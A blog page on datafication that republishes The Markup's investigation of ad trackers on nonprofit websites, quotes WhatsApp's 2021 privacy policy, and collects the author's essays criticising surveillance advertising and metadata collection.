Datafication & Technology

Datafication, Phantasmagoria of the 21st Century

Page 5 of 5

Something Is Broken… (from The MarkUp)

Nonprofit Websites Are Riddled With Ad Trackers

Such organizations often deal in sensitive issues, like mental health, addiction, and reproductive rights—and many are feeding data about website visitors to corporations

By: Alfred Ng and Maddy Varner

Originally published on themarkup.org

Last year, nearly 200 million people visited the website of Planned Parenthood, a nonprofit that many people turn to for very private matters like sex education, access to contraceptives, and access to abortions. What those visitors may not have known is that as soon as they opened plannedparenthood.org, some two dozen ad trackers embedded in the site alerted a slew of companies whose business is not reproductive freedom but gathering, selling, and using browsing data. 

The Markup ran Planned Parenthood’s website through our Blacklight tool and found 28 ad trackers and 40 third-party cookies tracking visitors, in addition to so-called “session recorders” that could be capturing the mouse movements and keystrokes of people visiting the homepage in search of things like information on contraceptives and abortions. The site also contained trackers that tell Facebook and Google if users visited the site.

The Markup’s scan found Planned Parenthood’s site communicating with companies like Oracle, Verizon, LiveRamp, TowerData, and Quantcast—some of which have made a business of assembling and selling access to masses of digital data about people’s habits. 

Katie Skibinski, vice president for digital products at Planned Parenthood, said the data collected on its website is “used only for internal purposes by Planned Parenthood and our affiliates,” and the company doesn’t “sell” data to third parties. 

“While we aim to use data to learn how we can be most impactful, at Planned Parenthood, data-driven learning is always thoughtfully executed with respect for patient and user privacy,” Skibinski said. “This means using analytics platforms to collect aggregate data to gather insights and identify trends that help us improve our digital programs.” 

Skibinski did not dispute that the organization shares data with third parties, including data brokers. 

A Blacklight scan of Planned Parenthood Gulf Coast—a localized website specifically for people in the Gulf region, including Texas, where abortion has been essentially outlawed—churned up similar results. 

Planned Parenthood is not alone when it comes to nonprofits, some operating in sensitive areas like mental health and addiction, gathering and sharing data on website visitors.

Using our Blacklight tool, The Markup scanned more than 23,000 websites of nonprofit organizations, including those belonging to abortion providers and nonprofit addiction treatment centers. The Markup used the IRS’s nonprofit master file to identify nonprofits that have filed a tax return since 2019 and that the agency categorizes as focusing on areas like mental health and crisis intervention, civil rights, and medical research. We then examined each nonprofit’s website as publicly listed in GuideStar. We found that about 86 percent of them had third-party cookies or tracking network requests. By comparison, when The Markup did a survey of the top 80,000 websites in 2020, we found 87 percent used some type of third-party tracking. 

About 11 percent of the 23,856 nonprofit websites we scanned had a Facebook pixel embedded, while 18 percent used the Google Analytics “Remarketing Audiences” feature. 

The Markup found that 439 of the nonprofit websites loaded scripts called session recorders, which can monitor visitors’ clicks and keystrokes. Eighty-nine of those were for websites that belonged to nonprofits that the IRS categorizes as primarily focusing on mental health and crisis intervention issues.

“As a user of this website, by sharing your information with them, you probably don’t assume that this sensitive information is shared with third parties and definitely don’t assume that your keystrokes are recorded,” Gunes Acar, a privacy researcher who copublished a 2017 study on session recorders, said. “The more sensitive the website is, the more worried I am.” 

Tracy Plevel, the vice president of development and community relations at Gateway Rehab, one of the nonprofits with session recorders on its site, said that the nonprofit uses trackers and session recorders because it needs to stay competitive with its larger, for-profit counterparts.

“As a nonprofit ourselves, we are up against for-profit providers with large advertising budgets as well as the addiction treatment brokers who grab those seeking care with similar online advertising tactics and connect them with the provider who is offering the greatest ‘sales’ compensation,” Plevel said. “Additionally we know user experience has a big impact on following through on treatment. When someone is ready to commit to treatment, we need to ensure it [is] as easy as possible for them before they get frustrated or intimidated by the process.” 

Other nonprofits had a significant number of trackers embedded on their sites as well. The Markup found 26 ad trackers and 50 third-party cookies on The Clinic at Sharma-Crawford Attorneys at Law, a Kansas City legal clinic that represents low-income people facing deportation.

Rekha Sharma-Crawford, the board president of The Clinic, wrote in an emailed statement, “We take privacy and security concerns very seriously and will continue to work with our web provider to address the issues you have identified.”

Save the Children, a humanitarian aid organization founded more than 100 years ago, had 26 ad trackers and 49 third-party cookies. March of Dimes, a nonprofit started by President Franklin D. Roosevelt that focuses on maternal and infant care, had more than 29 ad trackers on its site and 58 third-party cookies. City of Hope, a Californian cancer treatment and research center, had 25 ad trackers and 47 third-party cookies. 

Paul Butcher, assistant vice president of global digital strategy at Save the Children, said in an emailed statement that the organization “takes data protection very seriously.” Butcher also wrote that Save the Children collects some data through ad trackers “to improve user experience” and that the organization is in the process of revamping its data retention policies and recently hired a new head of data.

March of Dimes and City of Hope did not respond to requests for comment.

State-Level Privacy Laws Miss Nonprofits

While health data is governed by HIPAA, and FERPA  regulates educational records, there are no federal laws governing how websites track their visitors. Recently, a few states—California, Virginia, and Colorado—have enacted consumer privacy laws that require companies to disclose their tracking practices and allow visitors to opt out of data collection. 

But nonprofits in two of those states, California and Virginia, don’t need to adhere to the regulations. 

Sen. Ron Wyden (D-OR), who has proposed his own federal privacy legislation, said that nonprofits accrue a large amount of potentially sensitive data. 

“Nonprofits store incredibly personal information about things we’re passionate about, from political causes and social views to which charitable causes we care about,” Wyden said in an emailed statement. “If a data breach reveals someone donates to a domestic violence support group or an LGBTQ rights organization or the name of their mosque, any of that information could be incredibly private.”

Nonprofit leaders, however, argue that they lack the infrastructure and funding to comply with privacy law requirements and must gather and share information on donors in order to survive. 

“One of the most substantive and impactful uses of data by nonprofits has been our fundraising,” said Shannon McCracken, the CEO of The Nonprofit Alliance, an advocacy group made up of nonprofits and businesses. “Without the ability to cost-effectively reach prospective new donors and current donors, then nonprofits can’t continue to be as impactful as they are today.” 

But purposeful or not, privacy experts say, nonprofits are feeding personal information to data brokers and tech giants like Facebook and Google. 

“A nonprofit might share your phone number and name with LiveRamp. Tomorrow, a for-profit entity can then reuse that same data to target you,” said Ashkan Soltani, a privacy expert and former chief technologist at the Federal Trade Commission. “The data flows that go into these third-party aggregators and data brokers come often from nonprofits as well.” 

Soltani, who was appointed executive director of the California Privacy Protection Agency on Oct. 4, helped draft the California Consumer Privacy Act, which was originally introduced with the nonprofit exemptions.

Many major nonprofits work with data brokers to help organize and analyze their data, Jan Masaoka, CEO of the California Association of Nonprofits, said. 

“People that have big donor lists use them extensively, pretty much all of them use one of the services,” Masaoka said. “They don’t keep it in-house, pretty much everybody keeps it with one of these services.” 

She noted that Blackbaud is a company that nonprofits often turn to. The registered data broker’s marketing material promotes a co-op database that combines donor data from more than 550 nonprofits with public information on millions of households. 

Blackbaud didn’t respond to a request for comment.

Because of a lack of funds, nonprofits also rely on third-party platforms—which also happen to be data brokers—to manage their data’s security and privacy, McCracken said. But these kinds of companies aren’t immune to cyberattacks either: Blackbaud disclosed a ransomware attack in 2020 in which hackers stole passwords, Social Security numbers, and banking information, according to a Securities and Exchange Commission filing. Hundreds of charitable organizations, schools, and hospitals were affected, along with more than 13 million people, according to the Identity Theft Resource Center. 

“They rely on this kind of problematic ecosystem to achieve their work, and as a result, they share number lists, email addresses, or browsing behavior with third-party advertising companies and subject their members to risk,” Soltani said.

The Exception

Unlike its predecessors in California and Virginia, Colorado’s privacy bill doesn’t have an exemption for nonprofits. 

In both California and Virginia, the bills’ main supporters gave nonprofits an exemption as a political maneuver. Alastair Mactaggart, a real estate developer and founder of Californians for Consumer Privacy, who was the driving force behind the California Consumer Privacy Act, said his proposal was already facing opposition from tech giants and didn’t want a political showdown with nonprofits, too. 

“You gotta take the first step, so we figured this was the one that would be the easiest to bounce off,” Mactaggart said. “Eventually, I hope that the big nonprofits are included as well.”

David Marsden, the state senator who introduced the Virginia Consumer Data Protection Act, echoed that sentiment, reflecting that the law wasn’t perfect but still a good start.

“Does this pick up everybody that it should, or exempt everybody who needs an exemption? Probably not, but it comes pretty close,” Marsden said. “We were able, with this bill, to get it passed without people getting up and objecting to what we were trying to do.” 

Colorado state senator Robert Rodriguez, who co-sponsored the state’s privacy bill, said he didn’t include an exemption for nonprofits because he felt that any entity that had data on more than 100,000 people should have to follow privacy protections. He also didn’t understand why other states had exemptions. 

“Someone that has over 100,000 records is a good size,” he said in an email. “They should have some protections or requirements to follow.” 

This article was originally published on The Markup and was republished under the Creative Commons Attribution-NonCommercial-NoDerivatives license.

WhatsApp Terms of Service & Privacy Policy as of March 2021

In the post “Why I Am Quitting WhatsApp – Part II” below I mention a link to the Terms of Services and the Privacy Policy. Since those terms change with time, I enclose an excerpt below of the terms as of 27 March 2021 in pdf format.

The clause “Information We Collect” is divided into three groups:

  1. Information you provide (hinting that the other two are information that you do NOT (and may not want to) provide),
  2. Automatically collected information,
  3. Third-party information.

Please see content below.

Information You Provide

• Your Account Information. You provide your mobile phone number to create a WhatsApp account. You provide us the phone numbers in your mobile address book on a regular basis, including those of both the users of our Services and your other contacts. You confirm you are authorized to provide us such numbers. You may also add other information to your account, such as a profile name, profile picture, and status message.

• Your Messages. We do not retain your messages in the ordinary course of providing our Services to you. Once your messages (including your chats, photos, videos, voice messages, files, and share location information) are delivered, they are deleted from our servers. Your messages are stored on your own device. If a message cannot be delivered immediately (for example, if you are offline), we may keep it on our servers for up to 30 days as we try to deliver it. If a message is still undelivered after 30 days, we delete it. To improve performance and deliver media messages more efficiently, such as when many people are sharing a popular photo or video, we may retain that content on our servers for a longer period of time. We also offer end-to-end encryption for our Services, which is on by default, when you and the people with whom you message use a version of our app released after April 2, 2016. End-to-end encryption means that your messages are encrypted to protect against us and third parties from reading them.

• Your Connections. To help you organize how you communicate with others, we may create a favorites list of your contacts for you, and you can create, join, or get added to groups and broadcast lists, and such groups and lists get associated with your account information.

• Customer Support. You may provide us with information related to your use of our Services, including copies of your messages, and how to contact you so we can provide you customer support. For example, you may send us an email with information relating to our app performance or other issues.

Automatically Collected Information

• Usage and Log Information. We collect service-related, diagnostic, and performance information. This includes information about your activity (such as how you use our Services, how you interact with others using our Services, and the like), log files, and diagnostic, crash, website, and performance logs and reports.

• Transactional Information. If you pay for our Services, we may receive information and confirmations, such as payment receipts, including from app stores or other third parties processing your payment.

• Device and Connection Information. We collect device-specific information when you install, access, or use our Services. This includes information such as hardware model, operating system information, browser information, IP address, mobile network information including phone number, and device identifiers. We collect device location information if you use our location features, such as when you choose to share your location with your contacts, view locations nearby or those others have shared with you, and the like, and for diagnostics and troubleshooting purposes such as if you are having trouble with our app’s location features.

• Cookies. We use cookies to operate and provide our Services, including to provide our Services that are web-based, improve your experiences, understand how our Services are being used, and customize our Services. For example, we use cookies to provide WhatsApp for web and desktop and other web-based services. We may also use cookies to understand which of our FAQs are most popular and to show you relevant content related to our Services. Additionally, we may use cookies to remember your choices, such as your language preferences, and otherwise to customize our Services for you. Learn more about how we use cookies to provide you our Services.

• Status Information. We collect information about your online and status message changes on our Services, such as whether you are online (your “online status”), when you last used our Services (your “last seen status”), and when you last updated your status message.

Third-Party Information

• Information Others Provide About You. We receive information other people provide us, which may include information about you. For example, when other users you know use our Services, they may provide your phone number from their mobile address book (just as you may provide theirs), or they may send you a message, send messages to groups to which you belong, or call you.

• Third-Party Providers. We work with third-party providers to help us operate, provide, improve, understand, customize, support, and market our Services. For example, we work with companies to distribute our apps, provide our infrastructure, delivery, and other systems, supply map and places information, process payments, help us understand how people use our Services, and market our Services. These providers may provide us information about you in certain circumstances; for example, app stores may provide us reports to help us diagnose and fix service issues.

• Third-Party Services. We allow you to use our Services in connection with third-party services. If you use our Services with such third-party services, we may receive information about you from them; for example, if you use the WhatsApp share button on a news service to share a news article with your WhatsApp contacts, groups, or broadcast lists on our Services, or if you choose to access our Services through a mobile carrier’s or device provider’s promotion of our Services. Please note that when you use third-party services, their own terms and privacy policies will govern your use of those services.

Algorithmic Sociality

I had a discussion about cells membranes and boundaries with a friend. The discussion arose from a quote by Fritjof Capra in his course The Systems View Of Life: “Boundaries in the biological realm are not boundaries of separation but boundaries of identity”. My friend’s questions was ‘What is the function of a membrane in social dynamics?’

This discussion about social membranes creating social identity reminds me about the phenomenon of “filter bubbles” created by the algorithms of social media platforms (for those unfamiliar with the concept, Eli Pariser’s TED talk is a good entry point. Basically, by editing what information we get access to (through search or in our newsfeed), online algorithms create a membrane around us that narrowly define our identity, and this is reinforced by constantly feeding us more of the same.


A few years ago in 2017, I did an explorative and investigative study on Facebook to interrogate the algorithmic black box. I created two fake profiles, Samsara Marks (female) and Bertrand Wooster (male). Samsara’s profile was richly fleshed out (highly educated professional with feminist interests), but gave FB only minimal info about Bertrand: his age (late 40s), a (random) Hong Kong mobile number, his residency (Hong Kong), his country of citizenship (UK) (and of course FB had pieces of digital info even though I created the profile behind the university’s firewall from a random computer at uni).


With this limited info, FB suggested 150 friends for Bertrand at the first login (interestingly most of them outside of Hong Kong). I accepted all FB suggestions (and subsequent suggestions as well). I am not going to bore you with details, but to make a long story short, Bertrand found himself transported to the bowels of FB: explicit sexual content, prostitution and what I suspected could be pedophile networks, and “how to” videos on how to make weapons to shoot down missiles (I am not making this up) amongst others. Friendless but highly accomplished Samsara on the other hand keeps receiving ads for kitchen appliances and dresses.


My purpose for posting this is to bring attention to the active role of social platforms in shaping sociability and creating social membranes around us. One of the conclusions of the experience was that, once the algorithms has established the membrane, it takes conscious efforts, extreme determination and a very consistent strategy to change what the membrane lets in and out.

Private Messaging Apps

A good friend sent this link to me today: https://nordvpn.com/blog/most-secure-messaging-app. It’s a good article, you should read it. This however, prompted the thoughts below.

Good Morning! Thank you for sharing this!

It’s true that signal is the most secure messaging app. I use both telegram and signal. They both have pros and cons like all apps.

Since WhatsApp change of T&C there have been many articles that speak about the privacy of messaging apps. And it’s great because the discussion brings awareness to this aspect of communication. However I think it’s also the wrong (first) question to ask because it is reductionist and puts the focus on the wrong thing. Let me explain!

The social web brought about shifts of a magnitude last seen with the invention of the printing press. The economy of the social web is supported by a model (targeted advertising) that is BY DESIGN hostile to our well being, social balance and democratic values. When I say by design it means that the model itself contains in its essence imperatives that are fundamentally hostile to the above. It distorts debates, polarises society, addicts individuals. It can’t work if it doesn’t do that. Those effects are intrinsic to the model.

So what we are witnessing at the moment is nothing less than an ecological crisis. We have a digital social economy based on a model which “side effects” are wrecking havoc in our lives and our societies (whether they are really “side” effects or just effects is another debate for another time).

In 1964 Rachel Carson write a seminal book called Silent Spring, a desperate call for the world to wake up to the large scale slaughtering of our natural environment. Today we are faced with a similar crisis, an ecological crisis of our inner environments.

So to go back to the question about the privacy of messaging apps. I said earlier it’s a good question of course but the wrong question to start with. Apps are not created equal. They are not stand-alone isolated entities. They exist in a larger system. Apps like Telegram and Signal (and a bunch of less popular messaging apps) are not owned by large monopolies which profits rest on targeted advertising. They may or may not be the most secure, but even if they are not, the systemic effect of using them will be very different than those of using an app like WhatsApp or FB messenger which belong to a monopolistic entity that has shown many times it was ready to lie and manipulate with total disregard for the effects of their services on the planet.

So the first question to ask is: by using this technology, whose interests am I serving? To go back to the parallel with environmental ecology, asking whether an app is private is the equivalent of asking whether a good is too expensive without looking at the ecosystem that produces it. Maybe a good is expensive but it is of quality and produced in an ecosystem that favours small producers and benefits the real economy.

To be honest most of us do NOT need messaging apps that absolutely protect our communications. None of what I have ever written to you or on our group chats for example warrants a level of secrecy required to keep state secrets, or to keep investigative journalists in authoritarian countries safe (or these type of things).

And then, what do we mean by “private”? We have been habituated to think about privacy as hiding the content we share from the snooping eyes of government or police etc. This is surely one important aspect of privacy but in the digital age by far not the only one.

To understand why, we need to understand a fundamental difference that the FB and Googles of the world are very careful not to emphasise. It’s the difference between content and meta content. Content (or data) is what we share, the messages, the photos, the emojis etc… meta content is meta data, which is the collateral information that accompanies communication. Targeted advertising companies are meta data hungry not content hungry (see the post below “Why I Am Quitting WhatsApp Part II“).

Meta data is really the gold of the social internet because when aggregated and analysed by the large systems of big data they reveal things about us that we would not dream to share as content. And by the way, those insights are much more valuable than raw data and can be shared with government, police etc.

This is why we need to become conscious digital consumers. Just as we try not to consume plastic straws or make efforts to buy sustainable coffee, we need to make efforts and care for what type of digital technology we consume. Remember that behind the app, there is a whole ecosystem.

I know people who decide to lead a sustainable lifestyle, only buy organic food and walk to their work but who consume technology with the gluttony of a pig and the lack of awareness of a 2 years old (no disrespect to pigs and 2 years old here, this is what they are supposed to do! 😉). This is just not coherent!

TEDx Open Mic Follow Up: What Can we Do?

At the end of the open mic yesterday, you asked me a really important question and I do not think that my on-the-spot answer was explicit enough. The question was: “so what can we do?” It is a complex question. I thought about it last night and today and I would like to add a few more words which I hope will shed a clearer light on this complex matter. Here are some avenues for possible answers.

One way to think about an answer is to look at two possible levels of action. The systemic (policy) and the individual levels. At the policy level, regulation is coming. The EU has been the most aggressive so far (GDPR) but it will take time because this phenomenon is complex and it is unprecedented, which means that at the moment, there are no suitable laws to frame it and we do not even really understand how it works. Regulation will also likely be watered down by powerful networks of influence. In the US, the fact that Facebook and Google WANT the Federal government to come up with regulation clearly shows that they are confident they have the power to lobby and influence the end-result.

However, an increasing number of smart voices are putting forward some creative propositions that could easily and quickly be put into action. One of them for example is Paul Romer (co- recipient of the Nobel Memorial Prize in Economic Sciences in 2018) who advocates a Digital Tax (Digital Ad-Tax) as an incentive for good behaviour. Compelling initiatives are coming from the arts world as well. Adam Harvey did a great work on revealing the hidden datasets that feed the rise of AI-driven facial recognition. Manuel Beltrán’s Cartographies of Dispossession discloses the forms of systematic data dispossession. Taken individually, none of those propositions will make things right, but they all contribute to creating a more sustainable system.

The other level of action is individual; here we ask the question: “what can I do?”

As I said yesterday, I think that right now what is most urgently required is for us to become aware about what this all really means. The different debates around digital platforms technology at the moment (privacy, fake news, misinformation, anti-trust etc) are all parts of the same whole. The datafication of human experience is not only a technological issue, it is not only a social, economic or political issue, it is an ecological issue. Which means that we are dealing with a complex system. Complex systems present dilemma rather than problems. Because they do not lend themselves readily to linear solutions, they ask for a change of mindset. They require to be tackled at the same time from different angles; they need time, flexibility and vision; and they demand from us to do something that humans usually find most challenging: change our existing patterns of behaviour.

We need to change our behaviours. How? To be honest, as users, at the moment, we do not have much leverage. The digital universe we live in has emerged from a legal void and has largely been shaped by the major actors of the digital economy to serve their interests. We can’t opt-out of the terms and conditions of the social platforms we use everyday and keep using their services. Behavioural Economics has revealed what psychologists have known about human nature for a long time: as emotional beings we are easily manipulated. 2017 Nobel Prize recipient behavioural economist Richard Thaler and Cass Sunstein call this nudging and wrote a book on the topic. For the past 30 years or so, BJ Fogg, from the Behaviour Design Lab at Stanford University, has been teaching students how to use technology to persuade people. He calls this discipline by a really interesting name: “captology”. Today, captology helps keep users captive.

However, we are not helpless. We do not have a wide array of choices, but it does not mean we have none. We do have one power. The power of voting with our feet. This means we need to change our behaviours. To say “I can’t leave this platform because everyone is there” is the digital equivalent of saying I will start recycling when the planet is clean. Google is not the only search engine (try DuckDuckGo), Chrome not the only browser (try Firefox), Gmail not the only email provider (try ProtonMail), WhatsApp not the only messaging app (try Signal or Telegram).

We also need to seriously (SERIOUSLY) reassess the personal values that underlie our consumption of digital technologies.

It’s convenient. We are creatures of habits, so convenience has been baked into the design of social tech to make us complacent and lazy. But convenience is not a value that yields the greatest results in terms of ecological sustainability. Today, we understand that our patterns of consumption (food, clothing etc.) affect our environment. So, while it is also more convenient to throw garbage out of the window, despite the efforts required, we recycle. As informed and conscious consumers, we take great pains in consuming consciously. And in doing so, we influence the companies that create the products we consume. Why don’t we adopt the same behaviours when it comes to digital?

It’s free. Would you really expect to go to the supermarket, pile food up in a trolley and leave without paying a cent? Would you find it completely natural to enter a [Prada] shop (fill in with the name of your preferred brand), pick up a few handbags, a jacket or two and some small leather goods and leave with a dashing smile on your face and your credit card safely in your bag? Last time I checked, I think those behaviours were called “stealing” and they were punished by law. As a rule of thumb, we need to remember the most important theorem of the digital age: “when it’s free, it’s not free”. Plus, to go back to the environment analogy, we also considered nature as a free resource to be pilfered for our own profit. See how well we did with that? Just to put things in perspective, a paid account with the most secure email in the world, ProtonMail, costs US$50 a year. This is what you would spend for 8 mocha Frappuccino at Starbucks (and ProtonMail is much better for your health). So don’t be shy, pay for sustainable, clean technology! This requires a major change of mindset, but we will all be better off in the end.

In his book “WTF? What’s the Future and Why It’s Up to Us: Tim O’Reilly says that the master algorithm encoded by the targeted advertising business is optimised to be hostile to humanity. So one last thought. Today, we are still in the social media era, but how about tomorrow? The technologies in the making carry with them a level of intensity and a potential for behaviour modification, control and a possibility for destruction unequaled in the history of humanity (see Jaron Lanier). It took us 60 years to wake up to the slaughtering of our natural environment, we won’t be given so much time to react to the slaughtering of human experience.

TEDx Open Mic: Datafication, Silent Spring of the Digital Age

This is the 3mn presentation I gave at the TEDxTinHauWomen open mic on June 16th, 2021.

27 years ago, my son Alistair was born. As many of you know, giving birth is an intense experience, a mix of fear and exhilaration, and so many emotions and sensations that I can’t even start to name or describe. And then when your baby arrives, finally, the love you feel at that time is unlike anything you have ever felt before.

After Alistair was born, I did not think there was enough space in my heart to feel more love, but then my daughter Aurelie arrived. And something completely magical happened. The infinite love I felt for my first child expanded infinitely for my second child.

I am not a mathematician, so I do not know if there is a formula that can infinitely grow the infinite, but in my books, love or any other human experience is not something that can readily be turned into numbers. There is just something magical about human experience that defies quantification.

Today we live in a world where infinite love looks like this: [see image below]. That’s the “datafication” of our qualitative inner experience and this so called knowledge is used to make money.

Today we live in a world where infinite love looks like this (Image by Gerd Altmann from Pixabay)

There is a school of thought anchored in positivism that believes that people are just their behaviours, and those behaviours can be divided into parts, turned into numbers, analysed and spit out a realistic picture of the world. It may be true in the hard sciences, it is not so true in the social realm.

This reductionist view of life predates digital, but until Big Data it was relatively contained. But in the early 2000s, Google needed to turn a profit. Their AdWorks team realised that they could use the collateral behavioural data (“breadcrumbs”) that people left behind during search to make ads relevant not to keywords, as had been the case up to then, but to people. Targeted advertising was born, and with it, one the most pivotal epistemological shift in the history of humanity.

In 1964, environmentalist Rachel Carson wrote Silent Spring, a compelling call for the world to wake up to the large scale slaughtering of our natural environment. Today, we are doing to human experience what we did to nature 60 years ago.

The digital datafication and the commodification of human experience is creating a false knowledge of the world. It is significant because it is widespread and it affects decision-making at small and large scales, it is dangerous because it is biased, it is overpowering other forms of tacit knowledge that are more human friendly and it is fed back to us to help us orient ourselves in the world, and it is deeply unfair because it creates massive asymmetries of knowledge and therefore of power.

YOU, WE can say no. But we have to become aware of what this means and we have to act together. This is my slightly desperate but mostly impassioned plea, and I hope you heard it!

Datafication as Phantasmagoria

My main argument is that that datafication is the phantasmagoria of the 21st century, the same way mass consumerism was the phantasmagoria or the dream of the 20th century. My inspiration is the work of Walter Benjamin, The Arcades Project.

I am defining datafication as the quantification of qualitative aspects of life, i.e. human experience generally.

I am arguing that this phantasmagoria is creating a massive epistemological shift towards a more impoverished type of knowledge because in this massive enterprise of quantification, what cannot be turned into computer data or in other words what cannot be quantified is just abandoned. And now that algorithms are making decisions in most areas of life such as education finance justice and so on this quantification has a direct impact on the system as we live in.

More on this later…

Musings on Reductionism

A musing on reductionism, the type of thinking at the root of datafication, after an exchange with a friend on the topic.

He, rightfully I believe, mentioned that there is a place for reductionist thinking, it is useful and even essential for many tasks. The problem starts when we think of it as the path to truth.

I agree.

My issue with reductionism is not that it is useless or “bad” (for lack of a better word) in and of itself, but that, in the datafied society of the early 21st century where algorithms have taken over decision-making in many areas of life, it has become (or is fast becoming) the only valid source of knowledge. What can’t be reduced to computer data is for the most part abandoned. In other words, be subjugated or be forgotten

As a society, we bask in the warmth of the belief about the innate progress inherent to the digital revolution, and we self congratulate for having left a boring 20th century behind. But the type of thinking underscoring the digital “revolution” comes straight from the 19th century, so where is the revolution? It is the pinnacle of the logico-linear engineer type of thinking. I have nothing against engineers, they have an important place and role to play in our societies, but when this type of thinking colonises all areas of life and all dimensions of humaneness, and suppresses other ways of seeing and being in the world, I say Houston, we have a problem. 

Neil Postman (one of my favourite authors in the field of media studies, in many ways a visionary) touches upon this idea in his book “Technopoly: The Surrender of Culture to Technology”, a must-read! In a technopoly, the ideology underlying the technological tools becomes self-justifying and it is the technology that provides guidance to society instead of the other way round. 

Technopoly: The Surrender of Culture to Technology is a book by Neil Postman published in 1992 that describes the development and characteristics of a “technopoly”. He defines a technopoly as a society in which technology is deified, meaning “the culture seeks its authorisation in technology, finds its satisfactions in technology, and takes its orders from technology”. It is characterised by a surplus of information generated by technology, which technological tools are in turn employed to cope with, in order to provide direction and purpose for society and individuals.” [Wikipedia]

Why I Am Quitting WhatsApp – Part II

A couple of months ago I sent a message that started as follows: “For the past 5 years, I have been doing a PhD research on large social platforms. I want to share a few thoughts on why I am quitting WhatsApp before February 8th 2021.” The short memo was written after WhatsApp unilateral announcement that there were changing their T&C to accommodate WhatsApp For Business. Since then, Facebook postponed the changes to their T&C to May 15th after the announcement caused an uproar. 

Since I sent the message in January, I received many questions and comments, some people quit WhatsApp altogether, some opened accounts on other messaging platforms (mostly Telegram and Signal), and some disagreed completely with my analysis and kept using WhatsApp as usual. Based on the rich discussions I had with friends and acquaintances in the past few months, I want to share a few more thoughts before the change comes into reality. 

Why Did FB Postpone the Change to May 15th?

Delaying the change gave Facebook time to achieve two things. 

1. First, to rewrite the narrative through a process of habituation.

Habituation is a tactic that has been widely utilised by large social tech corporations in the past 15 years to gradually get us used to increasing encroachments on our privacy. 

The tactic works as follows:

  • Unilaterally announce the change. Ignore signs of disgruntlement. If the announcement causes a major uproar, issue a statement saying that you have been misunderstood and postpone. Stay low for a little while until some other news takes front stage (that shouldn’t take too long). 
  • This gives you time to design a communication campaign that heavily emphasises specific (reassuring) aspects of the issue (e.g., privacy is built into our DNA, we do not have access to the content of your messages) and completely obfuscate the real truth (we do not care a bit about the content of your messages, we want to track your behaviour not your words).
  • If opposition is too strong – for example as in the case of the Facebook Beacon feature implemented in 2007 and abandoned in 2009 after a class action lawsuit – find other technical ways to achieve the same goal, which is what FB did with Facebook Connect and spreading a piece of code in its Like button that sends information back to FB when you visit any unrelated site anywhere on the web. 

2. Second, it allowed Facebook to think out and implement a campaign of misinformation (I am using the word with purpose). Disinformation is the phenomenon of spreading lies. Misinformation is the phenomenon of spreading half-truths to create confusion or take control of the main narrative. WhatsApp is emphasising that the CONTENT of our messages is and will always remain private. What WhatsApp is not saying is that they could not care less about that content, because the data they hunger for is metadata. 

METADATA & PRIVACY

What’s Metadata? 

It is data about data, or data about your behaviour (not your words) when you are online. A few (non-exhaustive) examples are: who you know (your contacts), who you message, when and how often, who they know, who they message etc. But also, your device and user ID, your name, your location, your email, and all sorts of user and device content. In short, any activity that can be tracked and linked to you.

The Gold of the Internet

In tech parlance, metadata is referred to by the euphemism “breadcrumbs” (a noun that deceptively emphasises the innocuous and insignificant nature of this type of data). Google discovered early on that users left collateral behavioural data (the breadcrumbs) behind when they searched, and that the breadcrumbs could be aggregated and fed into machine learning to get really deep insights into who we are. Those insights go well beyond what we think we reveal when we live our life online. This collateral behavioural data is the “gold” of the internet. 

The discovery above marked the birth of “targeted advertising”, another euphemism for the enterprise of surveillance that has grown exponentially and largely unchecked since the early 2000s. It’s not what you say online (content), it’s the traces you leave that count (metadata). For more, see Shoshana Zuboff under “resources” below (if you read only one book on this topic, let it be hers).

A Narrow Definition of Privacy 

When we, users, think of privacy, we think about the content of the information we share online. But a quick look at WhatsApp Privacy Policy (see link below) makes two things clear:

  1. metadata (not content) is the core commodity being harvested. 
  2. we have no say in what and how our data is collected, how it is treated and what it is being used for.

Under the “Information We Collect” heading, there are 3 paragraphs. Interestingly, the first one is called “Information You Provide”, hinting that the other two are information that you do NOT (and may not want to) provide. Indeed, they are: “Automatically Collected Information” and “Third Party Information”. 

Here is an excerpt: “Device and Connection Information. We collect device-specific information when you install, access, or use our Services. This includes information such as hardware model, operating system information, browser information, IP address, mobile network information including phone number, and device identifiers.” It is really interesting to read through https://www.whatsapp.com/legal/privacy-policy if you have not already done so.

NB: WhatsApp Terms of Service and Privacy Policies change with time. I posted the pdf and some experts of the document as of 27 March 2021 in a post above.

REAL IMPLICATIONS OF WHATSAPP FOR BUSINESS

What’s Really Behind WhatsApp For Business?

As you probably know, WhatsApp has been sharing metadata from your chats with its parent company Facebook for some time already. The changes in T&C are meant to allow WhatsApp For Business (WFB) to take off the ground. 

What does it mean? On the face of it, WFB is merely a tool to help businesses “better communicate” with us, their customers. Officially, Facebook tells us that it just means that businesses will be able to chat with you, give you information on their products, follow up on your purchases and give you “better” customer service. But if you think about it, most of that could already be achieved before WFB. By opening the possibility for transactions on WhatsApp, WFB will allow Facebook to get extraordinarily granular collateral behavioural data on aspects of our lives it had only indirect, limited or no access to before

What Business?

One thing you may want to contemplate: what does “business” mean in “WhatsApp For Business”? Retail brands certainly, and this seems innocuous enough. But not only (and by the way, what seems innocuous to you is not so innocuous once it goes through the analytical capacities of Big Data). But “Business” may also cover health-related communications and transactions. You may not mind if Facebook peeks into your interactions with a fashion brand, but how would you like it to have granular access to your exchanges with businesses selling health devices and health practitioners (and that may include how much and how often you spend on treatments), insurers, money lenders, financial institutions and more? Do you really think that Facebook ought to have access to details from your credit cards and bank accounts statements (a statement states who, when and how much you spent with, so essentially, FB will have access to your statements)? 

IMPLICATIONS

Commodification of users 

I sometimes hear people say: “if you do not pay for a service online, you are the product”. It is true in spirit, but not completely. The massive enterprise of data extraction shows that we (users) have become, not the product, but the cheap commodity. From this, FB and Google extract the raw material they use to create the valuable products they sell not only to advertisers but to be honest, to anyone who is willing to pay for them whatever their intention. In other words, we are the pigs, not the Iberico ham

An Enterprise of Territorialisation

Another aspect of the enterprise of digital surveillance can be summed up in two words: “never enough”. The internal competitive logic of the targeted advertising model drives those corporations to ceaselessly expand in order to acquire ever-more predictive collateral behavioural data. Since we still live (slithers of) our life offline, it is not enough to surveil our lives online, so the tactics used online are seeping through to the physical world. 

Our bodies are the next frontier (in January 2021, Google paid $2.1 billion for Fitbit, a company that makes bracelets that record health and fitness data). Sensors, wearables, our bodies have become territories to conquer. How do you claim that territory? By creating new needs and new habits. 

Wearables and sensors in the physical world (think “smart” cities) can detect changes that happen in your body below the dermal layer. How is that for an invasion of privacy? Who gets all that data about your heart rate and the number of steps you take and how many times you wake up at night? Where does that information go? What happens to that data after it is collected? Who decides what to do with it? Who benefits in the end? Do you know? And more importantly do you mind? 

